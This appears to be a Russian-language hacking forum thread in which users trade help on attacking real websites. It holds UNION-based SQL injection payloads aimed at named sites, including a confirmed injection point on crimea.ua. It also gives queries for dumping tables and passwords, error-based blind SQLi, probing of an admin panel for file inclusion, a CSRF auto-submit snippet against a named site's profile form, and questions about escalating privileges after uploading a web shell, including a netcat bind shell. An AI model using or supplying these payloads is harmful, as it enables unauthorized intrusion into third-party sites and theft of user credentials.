Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17-- как это можно обойти?
Попробуй следующие запросы: id=-7888+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables limit n,1+--+ id=-7888+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=[таблица] или 0x[hex таблицы] limit n,1+--+ Попробуй перебор стандартных пользовательских таблиц: id=-7888+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17 from [таблица пользователей]+--+ Также иногда помогает hex: 0x[user],0x[password]
Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето? spasibo
Команда chmod +x - позволяет только запускать скрипт. +rx - позволяет запускать и просматривать содержимое. Также посмотрите и почитайте числовую установку прав доступа.
спс. а где ето ? на счет прав доступа неполучаеться поменять . пишет : админ - все доступы . ГРОУП - read only . другие : вообше нет. надо BIND делать и с netcat подключаться или по другому можно? )
самописный у него движок . ненаходит сканнер . Индекс.хтмл файла нету вообше. только индех.пх . где мануал какой нить ?
движок тут вобще не причём, под словами ,,Версия операционной системы --> exploit,, имеется в виду порутать серв ну понятное дело, все на пхп написано мануал по чём?
о том как повысить права или експлоит ОС где скачать и как юзать . Но может просто способ есть как присвоить себе права ? kak
Доброго времени суток, господа! есть у меня ряд вопросов по защите/атаке. чисто гипотетических. т.к. в качестве хобби решил заняться защитой информации. всегда меня это привлекало. дома на 2х ноута стоит windows 7. "лицензия", всегда свежие обновления от мелко-мягких, над этим всем неустанно бдит касперский со свежими базами. сеть организована следующим образом, есть модем(он же роутер) в режиме моста. внешний IP динамический. под виртуалкой на одном из ноутов развернут Kali Linux. собственно эксперементы в локальной сети уже провел все что смог придумать, да и это не особо интересно. т.к. в домашней локалке только я и жена. опробовал в локальной сети: 1. dns spoofing. рабтает на ура =) в содружестве с s.e.t. дает просто обалденные результаты. 2. social engeneer toolkit(классная вещь в прямых руках)(получил пароль жены минут за 15... не особое достижение при том что я и так все её пароли знаю. но все равно было приятно что метод работает) 3. различные снифера в пачке с подменой ARP таблиц. (работает на ура!) 4. попробовал metasploit/armitage(вещь конечно грамотная, при наличии открытых уязвимостей), но даже при их наличии выпиливается начисто антивирусом(криптовать пэйлоады пробовал, но видимо руки кривые). специально ставил java машину старой версии, с уязвимостю, но попытка эксплуатации была присечена самой виндой... в моем случае софтина оказалось абсолютно не эффективной. ну это все лирика. в локалке мне по хорошему бояться нечего. в виду ограниченого круга пользователей локальной сети. меня больше волнуют атаки из вне. допустим меня хотят взломать(получить доступ к почте/рабочей станции разницы нет). чего мне стоит опасаться? мне на ум приходят следующие атаки: 1. средствами СИ(или еще как) меня заманивают на страницу со зловредным скриптом использующем уязвимость в java или flash или браузере и т.д. я перехожу, скрипт и пэйлоад не пропалились антивирусом. у атакующего профит, он имеет полный контроль над системой и всем что в ней есть. 2. опять же средствами СИ меня заманивают на фэйковый сайт и я как полный лохопет сливаю свои пароли от ресурса. (маловероятно конечно, но и такое возможно, вдруг я буду пьян или упорот) 3. мне присылают вредоноса(батник, powerShell, exe'шник, pdf, flash, офисный документ, что еще можно прислать?) которого я конечно запущу в основной системе а не под виртуалкой с XP... 4. XSS на всеми нами любимом mail.ru(ради интереса поискал при помощи 3х разных сканеров из набора kali) нашел 0. но особо ин не старался. да и чревато это. если вам есть что добавить по поводу атак из вне, дописывайте мне как раз это и интересно. какие еще варианты атак существуют для получения доступа к компу или кражи почты? почта mail.ru или gmail. другим думаю мало кто сейчас пользуется. корпоративная почта не всчет, пусть об этом голова у службы безопасности болит. меня интересуют ситуации с атакой на конкретную цель. т.е. в данном случае меня. брутфорс не предлагать. это слишком очевидно.
есть сайтик один, в его админке проходя по адресу admin/index.php , сразу в адресной строке показывается /admin/index.php?env=-login:m0--1--s- . Тут получилось добиться пары ошибок: Если после /admin/index.php?env=- ставить любой символ, допустим 123 , то будет ошибка: Fatal Error: Cannot include "123" - file does not exist in /home/***/public_html/core/kernel/nparser/nparser.php on line 392 Если запрос ставить так /admin/index.php?env=-login:antichat, то получим ошибку: Fatal Error: Configuration file for prefix antichat is unknown in /home/****/public_html/core/kernel/utility/unit_config_reader.php on line 905 Если вместо admin/index.php?env=-login поставить любые другие символы, то переадресует на /admin/index.php?env=-login:m0--1--s- Вопрос знатокам, что тут можно попробовать? я так понимаю php inj может быть, с ней не знаком, какие действия попробовать предпринять?
RFI там, если более фильтраций нет. Может быть идет через explode разделение, эксперементировать на самом сайте надо. Ссылку в студию!
Здравствуйте, часто встречаются сайты в которых blind inj дает одинаковый ответ при true и false выражениях, но при некорректном sql запросе страница меняется. Использовать time based inj получается далеко не всегда. И что же делать? Я знаю про такой тип атаки - and if((substring(version(),1,1)=5),1,(select 1 union select 2)) При true выражении в первом операнде ошибки не будет. Соответственно при false mysql будет выдавать ошибку - страница поменяется. Все это конечно хорошо руками, но как данное дело настроить на sql map, что бы автоматизировать данный процесс? Мб кто нибудь уже пробовал. Заранее спасибо ребят.
Не могу подобрать кол-во столбцов Code: http://crimea.ua/category.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+ знатоки подскажите
А почему вы считаете, что здесь есть инъекция? Ни один тест её не подтверждает, тем более мы знаем по именам функций что это mysql. А вот на соседней странице она имеется: Code: http://crimea.ua/section.php?CatId=9&SecId=75+and+1=2%29+union+select+1,2,3,version%28%29,5+--+
салют, у меня такая проблема при попытке использовать XSRF, не могу сделать автовыполнения запроса так как в строке <form method="post" action="/profile" class="reg_form"> нет параметра name который должен быть вписан тут <html><body onload="document.forms['NAME'].submit();"> можете помочь? заранее спс
Если вы используете document.forms, вам надо задавать name форме или искать её по id. При статическом задании более-универсален такой варинт: PHP: <form id="test" ...>...</form> <script> document.getElementById('test').submit(); </script>
не бро не прокатило((( может сам попробуешь? https://euroits.com/profile там зарегаться придётся, уязвимость в редактировании профиля, если подставить своё произвольно значение name или id форма несрабатывает, тебя просто перебрасывает на страницу изменения данных, но сами данные не изменины( P.S при регистрации в поле кошелёк можно ввести "U1234567". попробуй заюзать XSRF если тебе не трудно. у меня на всех таких проектов получалось, но вот с этим беда(